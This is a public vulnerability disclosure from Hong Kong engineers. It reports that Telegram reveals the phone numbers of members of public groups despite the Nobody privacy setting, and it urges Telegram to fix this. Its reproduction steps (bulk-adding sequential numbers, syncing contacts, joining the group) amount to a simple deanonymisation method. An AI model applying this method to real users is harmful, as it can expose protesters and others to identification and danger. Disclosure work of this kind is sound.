This document describes a security vulnerability of Telegram that discloses phone numbers of any user in public Telegram groups, regardless of users’ privacy settings.

The bug was first reported in a Hong Kong discussion forum that is popular among Hong Kong protestors: https://lih.kg/1497612

We are a team of software engineers in Hong Kong and our team have independently verified the bug.

The bug was already made public, and it has high impact and low attack complexity. We have suspected that some government-sponsored attackers have exploited this bug and use it to target Hong Kong protesters, in some cases posting immediate dangers to life of the protestors. We are writing up the bug here and requesting Telegram to respond to this serious issue as soon as possible.


Here is the case and the steps to reproduce the bug:

  1. Alice, a Telegram user, is in a public group named CommonsGroup
  2. Alice do not want anyone to see her phone number in Telegram. So, she hide her phone number in Telegram’s privacy settings. (Privacy > Phone Number > Nobody)
  3. Mallory, the attacker, want to uncover the real identity of members in CommonsGroup.
  4. Mallory adds large number of phone numbers sequentially to the address book on her phone, assuming Alice’s phone number is in the list. (we have tested adding 10,000 phone numbers)
  5. Mallory syncs her contacts with Telegram
  6. Mallory joins CommonsGroup (which is public)

Expected Result

Alice’s phone number will never be shown in Telegram group info because she has set the phone number privacy to Nobody.

Actual Result

Mallory can see Alice's phone number in Group info. In theory, if Mallory adds enough phone numbers, she can uncover the phone number of any members in public groups. It is a real threat for us because the space for phone number in Hong Kong is limited.

Platforms

We have independently verify the bug with these settings:

Impact of the Bug

Telegram has a very important role in the current Hong Kong protests. We have been using Telegram to coordinate many demonstrations and direct actions in decentralized fashion. And we can only do it because Telegram provides enough level of anonymity to protestors.

The bug leaks the phone number of users, regardless of their privacy settings, to any other members with groups in common. It causes severe harm to the privacy all Telegram users, including people who are in need of communicating freely in order to protect their freedom.

Contacts

Twitter: @edwincheese

Adding large number of phone numbers to address book and sync to Telegram

Phone number of unknown people in public groups is visible in Group info, even the Phone Number Privacy was set to Nobody